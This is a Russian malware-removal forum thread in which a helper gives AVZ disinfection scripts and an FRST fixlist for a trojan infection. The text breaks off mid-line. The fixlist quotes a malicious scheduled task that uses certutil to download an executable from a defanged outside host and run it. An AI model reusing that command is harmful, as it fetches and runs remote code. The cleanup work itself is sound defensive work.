-
Внимание. Восстановление баз 1С7, 1C8 и Mssql после атаки шифровальщика, подробности и отзывы читайте в профильной теме.
Решена Поймал вирус, после загрузки "недо-чита"
- Автор темы shutg
- Дата начала
- Сообщения
- 5,698
- Реакции
- 1,884
- Баллы
- 563
Здравствуйте!
Через Панель управления - Удаление программ - удалите нежелательное ПО:
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Компьютер перезагрузится.
После выполнения скрипта на рабочем столе появится текстовый файл Correct_wuauserv&BITS.log. Его необходимо прикрепить к следующему посту.
После перезагрузки, выполните такой скрипт:
Файл quarantine.7z из папки с распакованной утилитой AVZ отправьте с помощью формы отправки карантина или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.
Для повторной диагностики запустите снова AutoLogger.
Прикрепите к следующему сообщению свежий CollectionLog.
Через Панель управления - Удаление программ - удалите нежелательное ПО:
Что не получится удалить стандартно, удалите принудительно через Geek Uninstaller
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Код:
{Исправление в службах в реестре, значения ImagePath.
Данный скрипт распространяется свободно и может быть модифицирован по согласованию с авторами - представителями SafeZone.cc
При публикации скрипта данный комментарий и ссылка на VirusNet.Info обязательна. }
var DescriptionTextWuauServ, DispayNameTextWuauServ, DescriptionTextBITS: String;
DispayNameTextBITS, FullPathSystem32, NameFolderSystem32, FileServiceDll: String;
ImagePathStr, RootStr, SubRootStr, LangID: string;
AllRoots, AllKeys, RootsRestored, KeysRestored, KeysFixed: integer;
FinishMsg, RestoreMsg, FixMsg, CheckMsg: String;
RegSectMsg, ParamMsg, ParamValueMsg, InRegSectMsg, CorrectMsg, RestMsg: String;
procedure CheckAndRestoreSection(Root: String);
begin
Inc(AllRoots);
if RegKeyExistsEx('HKLM', Root) then
RegKeyResetSecurity('HKLM', Root)
else
begin
Inc(RootsRestored);
RegKeyCreate('HKLM', Root);
AddToLog(RegSectMsg + Root + RestMsg);
end;
end;
procedure CheckAndRestoreSubSection;
begin
CheckAndRestoreSection(SubRootStr);
end;
procedure RestoredMsg(Root, Param: String);
begin
AddToLog(ParamMsg + Param + InRegSectMsg + Root + RestMsg);
Inc(KeysRestored);
end;
procedure FixedMsg(Root, Param: String);
begin
AddToLog(ParamValueMsg + Param + InRegSectMsg + Root + CorrectMsg);
Inc(KeysFixed);
end;
procedure RestoreStrParam(Root, Param, Value: String);
begin
RegKeyStrParamWrite('HKLM', Root, Param, Value);
RestoredMsg(Root, Param);
end;
procedure CheckAndRestoreStrParam(Root, Param, Value: String);
begin
Inc(AllKeys);
if not RegKeyParamExists('HKLM', Root, Param) then
RestoreStrParam(Root, Param, Value);
end;
procedure CheckAndRestoreIntParam(Root, Param: String; Value: Integer);
begin
Inc(AllKeys);
if not RegKeyParamExists('HKLM', Root, Param) then
begin
RegKeyIntParamWrite('HKLM', Root, Param, Value);
RestoredMsg(Root, Param);
end;
end;
procedure CheckAndRestoreMultiSZParam(Param, Value: String);
begin
Inc(AllKeys);
if not RegKeyParamExists('HKLM', RootStr, Param) then
begin
ExecuteFile('REG ADD HKLM\' + RootStr + ' /v ' + Param + Value, '', 0, 10000, true);
RestoredMsg(RootStr, Param);
end;
end;
// Исправление значения параметра ImagePath для служб 'wuauserv' и 'BITS'
procedure ImagePathFix(Node, Srv: String);
var RegStr: String;
begin
RegStr := 'SYSTEM\' + Node + '\Services\' + Srv;
if RegKeyExistsEx('HKLM', RegStr) then
begin
Inc(AllKeys);
RegKeyResetSecurity('HKLM', RegStr);
RegKeyStrParamWrite('HKLM', RegStr, 'ImagePath', ImagePathStr);
FixedMsg(RegStr, 'ImagePath');
end;
end;
{ Выполнение исправление всех ключей в ветках -
'HKLM\SYSTEM\CurrentControlSet\Services\BITS' и 'HKLM\SYSTEM\CurrentControlSet\Services\wuauserv'}
procedure CorrectRegistryRoot(DescriptionText, DisplayNameText, Srv: String);
var FileServiceDll, CCSNumber: string;
i : integer;
begin
if Srv = 'BITS' then
FileServiceDll := FullPathSystem32 + 'qmgr.dll'
else
FileServiceDll := FullPathSystem32 + 'wuauserv.dll';
RootStr:= 'SYSTEM\CurrentControlSet\Services\' + Srv;
CheckAndRestoreSection(RootStr);
CheckAndRestoreStrParam(RootStr, 'Description', DescriptionText);
CheckAndRestoreStrParam(RootStr, 'DisplayName', DisplayNameText);
CheckAndRestoreStrParam(RootStr, 'ObjectName', 'LocalSystem');
Inc(AllKeys);
if not RegKeyParamExists('HKLM', RootStr, 'ImagePath') then
RestoreStrParam(RootStr, 'ImagePath', ImagePathStr)
else
begin
Dec(AllKeys);
if LowerCase(RegKeyStrParamRead('HKLM', RootStr, 'ImagePath')) <> LowerCase(ImagePathStr) then
for i:= 0 to 999 do
begin
if i > 0 then
CCSNumber := FormatFloat('ControlSet000', i)
else
CCSNumber := 'CurrentControlSet';
ImagePathFix(CCSNumber, Srv);
end;
end;
CheckAndRestoreIntParam(RootStr, 'ErrorControl', 1);
CheckAndRestoreIntParam(RootStr, 'Start', 2);
CheckAndRestoreIntParam(RootStr, 'Type', 32);
if Srv = 'BITS' then
begin
CheckAndRestoreMultiSZParam('DependOnService', ' /t REG_MULTI_SZ /d RpcSs');
CheckAndRestoreMultiSZParam('DependOnGroup', ' /t REG_MULTI_SZ');
end;
SubRootStr:= RootStr + '\Enum';
CheckAndRestoreSubSection;
CheckAndRestoreStrParam(SubRootStr, '0', 'Root\LEGACY_' + UpperCase(Srv) + '\0000');
CheckAndRestoreIntParam(SubRootStr, 'Count', 1);
CheckAndRestoreIntParam(SubRootStr, 'NextInstance', 1);
SubRootStr := RootStr + '\Security';
CheckAndRestoreSubSection;
Inc(AllKeys);
if not RegKeyParamExists('HKLM', SubRootStr, 'Security') then
begin
RegKeyBinParamWrite('HKLM', SubRootStr, 'Security', '01,00,14,80,78,00,00,00,84,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,00,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,48,00,03,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00');
RestoredMsg(SubRootStr, 'Security');
end;
SubRootStr:= RootStr + '\Parameters';
CheckAndRestoreSubSection;
Inc(AllKeys);
if not RegKeyParamExists('HKLM', SubRootStr, 'ServiceDll') then
begin
RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
RestoredMsg(SubRootStr, 'ServiceDll');
end
else if LowerCase(RegKeyStrParamRead('HKLM', SubRootStr, 'ServiceDll')) <> LowerCase(FileServiceDll) then
begin
RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
FixedMsg(SubRootStr, 'ServiceDll');
end
end;
{ Главное выполнение }
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-9ib87.tmp\0azhp2m0ygx.tmp');
TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-90ino.tmp\254qbvv2tp4.tmp');
TerminateProcessByName('C:\Program Files (x86)\Sending\807482082.exe');
TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-sjkgu.tmp\aszr4hfqqps.tmp');
TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-811fj.tmp\b555vdpewj0.tmp');
TerminateProcessByName('c:\users\Компауктер\appdata\local\temp\csrss\cloudnet.exe');
TerminateProcessByName('c:\windows\rss\csrss.exe');
TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-31mu9.tmp\kevyn4knivc.tmp');
TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-14oc5.tmp\m4usqulpfrg.tmp');
TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-tkbjk.tmp\pv4tygyx1ma.tmp');
TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-p6q61.tmp\vuplm23ayky.tmp');
TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-59mf1.tmp\w11b02mylic.tmp');
QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-9ib87.tmp\0azhp2m0ygx.tmp', '');
QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-90ino.tmp\254qbvv2tp4.tmp', '');
QuarantineFile('C:\Program Files (x86)\Sending\807482082.exe', '');
QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-sjkgu.tmp\aszr4hfqqps.tmp', '');
QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-811fj.tmp\b555vdpewj0.tmp', '');
QuarantineFile('c:\users\Компауктер\appdata\local\temp\csrss\cloudnet.exe', '');
QuarantineFile('c:\windows\rss\csrss.exe', '');
QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-31mu9.tmp\kevyn4knivc.tmp', '');
QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-14oc5.tmp\m4usqulpfrg.tmp', '');
QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-tkbjk.tmp\pv4tygyx1ma.tmp', '');
QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-p6q61.tmp\vuplm23ayky.tmp', '');
QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-59mf1.tmp\w11b02mylic.tmp', '');
QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-IPNII.tmp\idp.dll', '');
QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-8F4VL.tmp\idp.dll', '');
QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-PGT87.tmp\idp.dll', '');
QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-7M6FH.tmp\idp.dll', '');
QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-NLD3F.tmp\idp.dll', '');
QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{21D3E532-D556-4E29-8EF9-96E6FD93EB94}.tmp', '');
QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{40DD8514-79A7-48D0-8206-2E626B333957}.tmp', '');
QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{F636453F-8024-46F6-A8EA-0BBAFF8F135C}.tmp', '');
QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{89F63FAC-A1A9-4F15-8C69-30276525D384}.tmp', '');
QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-S60QV.tmp\idp.dll', '');
QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-V36C1.tmp\idp.dll', '');
QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-UBAVD.tmp\idp.dll', '');
QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-G8QPQ.tmp\idp.dll', '');
QuarantineFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys', '');
QuarantineFile('C:\Users\Компауктер\AppData\Local\App\svchost.exe', '');
DeleteFile('c:\users\ad35~1\appdata\local\temp\is-9ib87.tmp\0azhp2m0ygx.tmp', '');
DeleteFile('c:\users\ad35~1\appdata\local\temp\is-90ino.tmp\254qbvv2tp4.tmp', '');
DeleteFile('C:\Program Files (x86)\Sending\807482082.exe', '');
DeleteFile('c:\users\ad35~1\appdata\local\temp\is-sjkgu.tmp\aszr4hfqqps.tmp', '');
DeleteFile('c:\users\ad35~1\appdata\local\temp\is-811fj.tmp\b555vdpewj0.tmp', '');
DeleteFile('c:\users\Компауктер\appdata\local\temp\csrss\cloudnet.exe', '');
DeleteFile('c:\windows\rss\csrss.exe', '');
DeleteFile('c:\users\ad35~1\appdata\local\temp\is-31mu9.tmp\kevyn4knivc.tmp', '');
DeleteFile('c:\users\ad35~1\appdata\local\temp\is-14oc5.tmp\m4usqulpfrg.tmp', '');
DeleteFile('c:\users\ad35~1\appdata\local\temp\is-tkbjk.tmp\pv4tygyx1ma.tmp', '');
DeleteFile('c:\users\ad35~1\appdata\local\temp\is-p6q61.tmp\vuplm23ayky.tmp', '');
DeleteFile('c:\users\ad35~1\appdata\local\temp\is-59mf1.tmp\w11b02mylic.tmp', '');
DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-IPNII.tmp\idp.dll', '');
DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-8F4VL.tmp\idp.dll', '');
DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-PGT87.tmp\idp.dll', '');
DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-7M6FH.tmp\idp.dll', '');
DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-NLD3F.tmp\idp.dll', '');
DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{21D3E532-D556-4E29-8EF9-96E6FD93EB94}.tmp', '');
DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{40DD8514-79A7-48D0-8206-2E626B333957}.tmp', '');
DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{F636453F-8024-46F6-A8EA-0BBAFF8F135C}.tmp', '');
DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{89F63FAC-A1A9-4F15-8C69-30276525D384}.tmp', '');
DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-S60QV.tmp\idp.dll', '');
DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-V36C1.tmp\idp.dll', '');
DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-UBAVD.tmp\idp.dll', '');
DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-G8QPQ.tmp\idp.dll', '');
DeleteFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys', '64');
DeleteFile('C:\Program Files (x86)\Sending\807482082.exe', '64');
DeleteFile('C:\Users\Компауктер\AppData\Local\App\svchost.exe', '64');
DeleteFile('C:\Windows\rss\csrss.exe', '64');
DeleteFile('c:\users\Компауктер\appdata\local\temp\csrss\cloudnet.exe', '64');
ClearLog;
ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\wuauserv', 'wuauserv.reg');
ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\BITS', 'BITS.reg');
LangID:= RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Nls\Language', 'InstallLanguage');
if LangID = '0419' then
begin
DescriptionTextWuauServ := 'Включает загрузку и установку обновлений Windows. Если служба отключена, то на этом компьютере нельзя будет использовать возможности автоматического обновления или веб-узел Центра обновления Windows.';
DispayNameTextWuauServ := 'Автоматическое обновление';
DescriptionTextBITS := 'Обеспечивает передачу данных между клиентами и серверами в фоновом режиме. Если служба BITS отключена, такие возможности, как Windows Update, не могут правильно работать.';
DispayNameTextBITS := 'Фоновая интеллектуальная служба передачи (BITS)';
AddToLog('Операционная система - русская');
FinishMsg := '–––– Восстановление завершено ––––';
RestoreMsg := 'Восстановлено разделов\параметров: ';
FixMsg := 'Исправлено параметров: ';
CheckMsg := 'Проверено разделов\параметров: ';
RegSectMsg := 'Раздел реестра HKLM\';
ParamMsg := 'Параметр ';
ParamValueMsg := 'Значение параметра ';
InRegSectMsg := ' в разделе реестра HKLM\';
CorrectMsg := ' исправлено на оригинальное.';
RestMsg := 'восстановлен.';
end
else if LangID = '0409' then
begin
DescriptionTextWuauServ := 'Enables the download and installation of Windows updates. If this service is disabled, this computer will not be able to use the Automatic Updates feature or the Windows Update Web site.';
DispayNameTextWuauServ := 'Automatic Updates';
DescriptionTextBITS := 'Transfers data between clients and servers in the background. If BITS is disabled, features such as Windows Update will not work correctly.';
DispayNameTextBITS := 'Background Intelligent Transfer Service';
AddToLog('Operation system - english');
FinishMsg := '–––– Restoration finished ––––';
RestoreMsg := 'Sections\parameters restored: ';
FixMsg := 'Parameters corrected: ';
CheckMsg := 'Sections\parameters checked: ';
RegSectMsg := 'Registry section HKLM\';
ParamMsg := 'Parameter ';
ParamValueMsg := 'Value of parameter ';
InRegSectMsg := ' in registry section HKLM\';
CorrectMsg := ' corrected on original.';
RestMsg := ' restored.';
end;
AddToLog('');
{ Определение папки X:\Windows\System32\ }
NameFolderSystem32 := RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Windows', 'SystemDirectory');
ImagePathStr := NameFolderSystem32 + '\svchost.exe -k netsvcs';
Delete(NameFolderSystem32, 1, pos('\', NameFolderSystem32) - 1);
FullPathSystem32 := GetEnvironmentVariable('WinDir') + NameFolderSystem32 + '\';
AllRoots := 0;
AllKeys := 0;
RootsRestored := 0;
KeysRestored := 0;
KeysFixed := 0;
CorrectRegistryRoot(DescriptionTextBITS, DispayNameTextBITS, 'BITS');
CorrectRegistryRoot(DescriptionTextWuauServ, DispayNameTextWuauServ, 'wuauserv');
AddToLog('');
AddToLog(FinishMsg);
AddToLog('');
AddToLog(RestoreMsg + IntToStr(RootsRestored) + ' \ ' + IntToStr(KeysRestored));
AddToLog(FixMsg + IntToStr(KeysFixed));
AddToLog(CheckMsg + IntToStr(AllRoots) + ' \ ' + IntToStr(AllKeys));
SaveLog(RegKeyStrParamRead('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders', 'Desktop') + '\Correct_wuauserv&BITS.log');
DeleteSchedulerTask('csrss');
RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Synapse3', '64');
RegKeyParamDel('HKEY_USERS','.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run','Synapse3', '32');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\RunOnce','i2ggdebicrf', '64');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\App','command', '64');
DeleteService('WinmonProcessMonitor');
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.После выполнения скрипта на рабочем столе появится текстовый файл Correct_wuauserv&BITS.log. Его необходимо прикрепить к следующему посту.
После перезагрузки, выполните такой скрипт:
Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.Для повторной диагностики запустите снова AutoLogger.
Прикрепите к следующему сообщению свежий CollectionLog.
- Сообщения
- 5,698
- Реакции
- 1,884
- Баллы
- 563
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
- Сообщения
- 5,698
- Реакции
- 1,884
- Баллы
- 563
По-прежнему в списке установленных
Удалите принудительно.
Затем:
- Отключите до перезагрузки антивирус.
- Выделите следующий код:
Код:Start:: CreateRestorePoint: CloseProcesses: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [YoungWood] => C:\Windows\rss\csrss.exe [5132288 2019-07-18] () [File not signed] <==== ATTENTION HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [ç'2+plA#p8.exe] => C:\Program Files\Windows NT\9IOMHVSST0TCI8Y35LF2TZR6E\ç'2+plA#p8.exe HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [2705260] => C:\Users\Компауктер\AppData\Roaming\zu4amnvtgvr\254qbvv2tp4.exe [1866371 2019-07-17] ( ) [File not signed] HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [6583976] => C:\Users\Компауктер\AppData\Roaming\crnof3twn1e\kevyn4knivc.exe [1866371 2019-07-17] ( ) [File not signed] HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [7574684] => C:\Users\Компауктер\AppData\Roaming\4qavsr3x335\w11b02mylic.exe [1866371 2019-07-17] ( ) [File not signed] HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [3884524] => C:\Users\Компауктер\AppData\Roaming\ch51whag4gk\0azhp2m0ygx.exe [1866371 2019-07-17] ( ) [File not signed] HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [7809743] => C:\Users\Компауктер\AppData\Roaming\g1qxn0urxz0\m4usqulpfrg.exe [1866371 2019-07-18] ( ) [File not signed] HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [GIBTQCD27PGP7SR] => C:\Program Files\CZLZVGPLWK\CZLZVGPLW.exe [1005568 2019-07-18] (1VYUW) [File not signed] HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [3981224] => C:\Users\Компауктер\AppData\Roaming\jclyrksahme\hemqvsph1fz.exe [1866371 2019-07-18] ( ) [File not signed] HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [CloudNet] => C:\Users\Компауктер\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-07-18] (EpicNet Inc.) [File not signed] <==== ATTENTION HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [3327155] => C:\Users\Компауктер\AppData\Roaming\o4wnkfzf33c\3hxl4zyymnv.exe [1866371 2019-07-18] ( ) [File not signed] HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [DUOZ9792LTR9WU0] => C:\Program Files\KACSYMBLU9\KACSYMBLU.exe [1005568 2019-07-18] (1VYUW) [File not signed] GroupPolicy: Restriction - Chrome <==== ATTENTION CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION Task: {008418BB-1111-4982-8B82-E778F1744239} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://gamedemo.xyz/app/app.exe C:\Users\Компауктер\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Компауктер\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION Task: {2FFC31DC-6D13-4B2D-9295-6FF7DA5F046B} - System32\Tasks\raSRPAMuIMRBbwMvC2 => rundll32 "C:\Program Files (x86)\woOqILJDRwqbnTOZbgR\vzSXBiV.dll",#1 Task: {7990DB9E-56F6-4C42-B5CF-B71969AFA0D4} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [5132288 2019-07-18] () [File not signed] <==== ATTENTION Task: {B01AA887-1515-4316-89B6-B9BA05C5956E} - System32\Tasks\AWWcazHJnUfLPA => rundll32 "C:\Program Files (x86)\WOFbcaOaHmAU2\yonHRkgDQgQOz.dll",#1 Task: {BD8C4F29-6FFA-416F-8F99-D8835E92C1F3} - System32\Tasks\txgYfgWClJeJBSoaCDR2 => rundll32 "C:\Program Files (x86)\BbdjrrKUeUXuC\MmTSDoE.dll",#1 Task: {E0B2FD73-0171-4618-855B-416F93A4755E} - System32\Tasks\JSpPUlYEOjGQEpF2 => rundll32 "C:\Program Files (x86)\rZdaClXBU\oHkDgO.dll",#1 HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGtusdZo2wa5vPziXtpMHiFAFEZjecz_bZMTRqZ3nD6F3eD7RCOwMHSRa41YdeJb_fO9PhwadGhtSPWZLttF1PLftx8e-A0mT1gaR0iEWkR_mU_knkeAAUhMOYpLAoaHp_mjGfba5uSW4OqnXi17v_VV2XQj_8OXYUfFLzNC9uGz&q={searchTerms} HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGtusdZo2wa5vPziXtpMHiFAFEZjecz_bZMTRqZ3nD6F3eD7RCOwMHSRa41YdeJb_fO9PhwadGhtSPWVB_ZJXfy9v33Oqj52VEDQ0UHnJBybNdPZqcsGN6dGgFOgr0I9aejHCgpAp3VZAwSiGGBlxkyzCPyo5k8BYXoqdBe6K7Fs SearchScopes: HKLM-x32 -> DefaultScope value is missing FF Homepage: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.HP FF NewTab: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.NT C:\Users\Компауктер\AppData\Roaming\Opera Software\Opera Stable\Extensions\idmfcgobgdhohmmpmldpceldejenflci C:\Users\Компауктер\AppData\Roaming\Opera Software\Opera Stable\Extensions\nknpohplagminmhchlbhigcgcdfigion R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] (Access Denied) <==== ATTENTION (Access Denied) S2 Main Service; C:\Program Files (x86)\MachinerData\ModularInstaller.exe [2801470 2019-07-18] () [File not signed] 2019-07-18 13:26 - 2019-07-18 13:27 - 000000000 ____D C:\Users\Компауктер\AppData\LocalLow\fuXIbnpPYAACF 2019-07-18 13:26 - 2019-07-18 13:26 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys 2019-07-18 13:25 - 2019-07-18 13:25 - 000003208 _____ C:\Windows\System32\Tasks\csrss 2019-07-18 13:02 - 2019-07-18 13:02 - 000003202 _____ C:\Windows\System32\Tasks\AWWcazHJnUfLPA 2019-07-18 13:02 - 2019-07-18 13:02 - 000002872 _____ C:\Windows\System32\Tasks\raSRPAMuIMRBbwMvC2 2019-07-18 13:02 - 2019-07-18 13:02 - 000002860 _____ C:\Windows\System32\Tasks\txgYfgWClJeJBSoaCDR2 2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\o4wnkfzf33c 2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Users\Все пользователи\JrsbweBqGiQFiyVB 2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\ProgramData\JrsbweBqGiQFiyVB 2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files\KACSYMBLU9 2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\woOqILJDRwqbnTOZbgR 2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\WOFbcaOaHmAU2 2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\vONNFjhTKIE 2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\uvtpOaoQoRUn 2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\rZdaClXBU 2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\BbdjrrKUeUXuC 2019-07-18 12:42 - 2019-07-18 13:25 - 000003516 _____ C:\Windows\System32\Tasks\ScheduledUpdate 2019-07-18 12:42 - 2019-07-18 12:42 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\jclyrksahme 2019-07-18 12:42 - 2019-07-18 12:42 - 000000000 ____D C:\Program Files\CZLZVGPLWK 2019-07-18 02:48 - 2019-07-18 02:48 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\gtktbi2qeg4 2019-07-18 02:48 - 2019-07-18 02:48 - 000000000 ____D C:\Program Files\D24SXXXQ3N 2019-07-18 02:28 - 2019-07-18 02:28 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\khun2zmqo4f 2019-07-18 02:28 - 2019-07-18 02:28 - 000000000 ____D C:\Program Files\LWAKZUUI1M 2019-07-18 02:08 - 2019-07-18 02:16 - 000000000 ____D C:\Program Files\XHKZU2V44D 2019-07-18 02:08 - 2019-07-18 02:08 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\y3lrrzpucgn 2019-07-18 02:06 - 2019-07-18 02:06 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\EpicNet Inc 2019-07-18 01:48 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\MachinerData 2019-07-18 01:47 - 2019-07-18 01:47 - 000000000 ____D 